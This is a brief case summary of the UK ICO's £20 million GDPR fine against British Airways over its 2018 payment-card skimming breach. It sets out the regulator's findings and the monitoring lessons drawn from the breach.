The ICO issued British Airways a £20 million fine following a 2018 data breach affecting approximately 400,000 customers. Attackers harvested customer and staff data including login credentials, payment card details, and personal information. The ICO found British Airways had poor security arrangements including inadequate authentication, poor patch management, and insufficient monitoring. The original proposed fine was £183.39 million, reduced due to COVID-19 economic impact considerations.
British Airways — GDPR Data Breach Fine (£20M)
What Went Wrong
Attackers injected malicious code into British Airways' website and mobile app harvesting card payment details during booking. 400,000 customer records were affected. The breach ran undetected from June to September 2018. British Airways did not detect the breach themselves — they were notified by a security researcher.
Lessons Learned
Web application monitoring and file integrity monitoring are essential. Payment card harvesting (Magecart attacks) are detectable with proper monitoring. Subprocessor security must be reviewed — the breach involved compromised JavaScript from a third-party vendor.
Source:
Official Enforcement Record ↗